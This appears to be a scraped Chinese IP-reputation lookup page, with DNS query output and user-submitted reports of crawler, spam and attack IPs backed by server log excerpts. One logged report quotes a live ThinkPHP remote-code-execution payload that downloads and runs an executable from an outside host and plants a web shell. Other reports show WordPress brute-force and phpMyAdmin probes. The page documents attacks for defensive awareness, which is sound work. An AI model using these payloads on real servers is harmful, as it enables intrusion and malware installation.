必须是合法有效的IP地址, 可以是IPv4或者是IPv6, 例如127.0.0.1或者2001:DB8:0:0:8:800:200C:417A
基本信息:

城市(city): unknown

省份(region): unknown

国家(country): United States of America (the)

运营商(isp): unknown

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:
暂无关于此IP的讨论, 沙发请点上方按钮
相同子网IP讨论:
暂无关于此IP所属子网相关IP的讨论.
WHOIS信息:
b
DIG信息:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 56.82.179.99
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 3248
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;56.82.179.99.			IN	A

;; AUTHORITY SECTION:
.			30	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2025022801 1800 900 604800 86400

;; Query time: 40 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sat Mar 01 02:06:37 CST 2025
;; MSG SIZE  rcvd: 105
HOST信息:
Host 99.179.82.56.in-addr.arpa. not found: 3(NXDOMAIN)
NSLOOKUP信息:
Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 99.179.82.56.in-addr.arpa: NXDOMAIN
相关IP信息:
最新评论:
IP 类型 评论内容 时间
220.181.108.90 bots
专爬图片的百度爬虫。。
2019-03-29 13:01:54
77.247.109.8 attack
端口扫描 黑客攻击
2019-04-04 08:12:04
66.249.66.138 bots
Googlebot,谷歌爬虫网段
2019-03-28 17:38:35
104.192.74.213 bots
机器IP,headless chrome
104.192.74.213 - - [04/Apr/2019:16:40:03 +0800] "GET /index.php/2018/12/05/baidu_2018_12_05_en/?replytocom=237 HTTP/1.1" 200 19564 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/70.0.3538.110 Safari/537.36"
104.192.74.213 - - [04/Apr/2019:16:41:00 +0800] "GET /index.php/2019/04/04/palantir_2019_04_04_en/ HTTP/1.1" 200 10235 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/70.0.3538.110 Safari/537.36"
104.192.74.213 - - [04/Apr/2019:16:41:46 +0800] "GET /index.php/2018/12/05/baidu_2018_12_05_en/?replytocom=6665 HTTP/1.1" 200 19563 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/70.0.3538.110 Safari/537.36"
2019-04-04 16:42:48
92.240.69.137 spamattack
垃圾IP
92.240.69.137 - - [29/Mar/2019:07:56:34 +0800] "GET /wp-login.php HTTP/1.1" 200 5139 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
92.240.69.137 - - [29/Mar/2019:07:56:34 +0800] "POST /wp-login.php HTTP/1.1" 200 5541 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
92.240.69.137 - - [29/Mar/2019:07:56:34 +0800] "POST /xmlrpc.php HTTP/1.1" 404 3693 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
2019-03-29 09:14:58
118.25.71.65 attack
攻击型IP
118.25.71.65 - - [31/Mar/2019:17:57:14 +0800] "GET /public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start%20C:/Windows/temp/rdoromzcvnzisoj23580.exe HTTP/1.1" 400 682 "http://118.25.52.138:443/public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start C:/Windows/temp/rdoromzcvnzisoj23580.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.71.65 - - [31/Mar/2019:17:57:14 +0800] "GET /public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php HTTP/1.1" 400 682 "http://118.25.52.138:443/public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^>hydra.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.71.65 - - [31/Mar/2019:17:57:14 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start%20C:/Windows/temp/rdoromzcvnzisoj23580.exe HTTP/1.1" 400 682 "http://118.25.52.138:443/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start C:/Windows/temp/rdoromzcvnzisoj23580.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
2019-03-31 17:58:18
5.188.210.17 spam
5.188.210.17 - - [03/Apr/2019:08:12:12 +0800] "GET /index.php/2018/12/16/facebook_2018_12_16_en/ HTTP/1.1" 200 14945 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0"
5.188.210.17 - - [03/Apr/2019:08:12:13 +0800] "GET /index.php/page/869/ HTTP/1.0" 200 81678 "https://www.eznewstoday.com/index.php/page/869/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR
/53.0.2907.99"
5.188.210.17 - - [03/Apr/2019:08:12:14 +0800] "GET /index.php/2019/02/07/amazon_2019_02_07_en/ HTTP/1.0" 200 47422 "https://www.eznewstoday.com/index.php/2019/02/07/amazon_2019_02_07_en/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like
 Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/53.0.2907.99"
5.188.210.17 - - [03/Apr/2019:08:12:14 +0800] "POST /wp-comments-post.php HTTP/1.0" 302 4146 "https://www.eznewstoday.com/index.php/2019/02/07/amazon_2019_02_07_en/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.33
59.170 Safari/537.36 OPR/53.0.2907.99"
2019-04-03 08:16:51
61.174.53.3 attack
61.174.53.3 - - [04/Apr/2019:14:03:05 +0800] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 301 194 "-" "ZmEu"
61.174.53.3 - - [04/Apr/2019:14:03:05 +0800] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu"
2019-04-04 14:07:14
180.153.234.234 bots
360爬虫列表
180.153.232.*
      180.153.234.*
      180.153.236.*
      180.163.220.*
      42.236.101.*
      42.236.102.*
      42.236.103.*
      42.236.10.*
      42.236.12.*
      42.236.13.*
      42.236.14.*
      42.236.15.*
      42.236.16.*
      42.236.17.*
      42.236.46.*
      42.236.48.*
      42.236.49.*
      42.236.50.*
      42.236.51.*
      42.236.52.*
      42.236.53.*
      42.236.54.*
      42.236.55.*
      42.236.99.*
2019-03-28 20:23:09
118.190.84.33 attack
118.190.84.33 - - [04/Apr/2019:13:19:38 +0800] "POST /wuwu11.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
118.190.84.33 - - [04/Apr/2019:13:19:38 +0800] "GET /wuwu11.php HTTP/1.1" 404 232 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
118.190.84.33 - - [04/Apr/2019:13:19:38 +0800] "POST /wuwu11.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
118.190.84.33 - - [04/Apr/2019:13:19:38 +0800] "GET /wuwu11.php HTTP/1.1" 404 232 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
118.190.84.33 - - [04/Apr/2019:13:19:39 +0800] "POST /wuwu11.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
118.190.84.33 - - [04/Apr/2019:13:19:39 +0800] "GET /wuwu11.php HTTP/1.1" 404 232 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
2019-04-04 13:26:43
84.222.144.104 attack
wordpress 暴力登录
84.222.144.104 - - [28/Mar/2019:17:34:34 +0800] "GET /wp-login.php HTTP/1.1" 302 284 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
84.222.144.104 - - [28/Mar/2019:17:34:34 +0800] "GET /wp-login.php HTTP/1.1" 200 7978 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
84.222.144.104 - - [28/Mar/2019:17:34:34 +0800] "GET / HTTP/1.1" 301 283 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
84.222.144.104 - - [28/Mar/2019:17:34:35 +0800] "GET / HTTP/1.1" 200 102795 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
2019-03-28 17:40:33
37.115.184.170 spam
37.115.184.170 - - [02/Apr/2019:09:49:36 +0800] "GET / HTTP/1.1" 301 228 "https://belarusy.net/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.3 (build 01218); .NET CLR 1.1.4322)"
37.115.184.170 - - [02/Apr/2019:09:49:36 +0800] "GET / HTTP/1.1" 301 228 "https://belarusy.net/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.3 (build 01218); .NET CLR 1.1.4322)"
37.115.184.170 - - [02/Apr/2019:09:49:37 +0800] "GET / HTTP/1.1" 301 228 "https://belarusy.net/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.3 (build 01218); .NET CLR 1.1.4322)"
2019-04-02 09:53:50
87.106.34.39 attack
87.106.34.39 - - [03/Apr/2019:08:15:20 +0800] "POST /xmlrpc.php HTTP/1.0" 404 468 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
2019-04-03 08:18:07
58.251.121.184 attack
58.251.121.184 - - [01/Apr/2019:07:47:17 +0800] "GET /ljb.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
58.251.121.185 - - [01/Apr/2019:07:47:17 +0800] "GET /db_cts.php HTTP/1.1" 404 209 "http://118.25.52.138/db_cts.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
58.251.121.184 - - [01/Apr/2019:07:47:17 +0800] "GET /ljb.php HTTP/1.1" 404 209 "http://118.25.52.138/ljb.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
2019-04-01 08:05:15
207.46.13.229 bots
微软bingbot
2019-03-29 09:12:04

最近上报的IP列表

208.116.228.55 143.251.53.233 43.208.198.133 95.101.205.50
232.41.228.186 251.151.179.202 187.9.47.150 61.157.31.161
15.237.57.86 249.101.148.232 129.79.42.194 178.15.187.78
209.55.75.74 200.89.221.42 79.239.35.133 206.126.203.181
212.205.248.11 241.203.137.245 141.65.103.152 52.213.165.176